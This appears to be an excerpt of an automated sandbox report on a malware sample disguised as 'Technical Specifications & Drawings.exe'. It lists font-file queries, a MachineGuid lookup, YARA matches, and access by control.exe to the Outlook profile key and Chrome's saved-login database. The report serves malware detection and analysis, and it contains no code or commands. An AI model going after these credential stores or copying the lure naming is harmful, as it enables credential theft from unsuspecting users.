Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY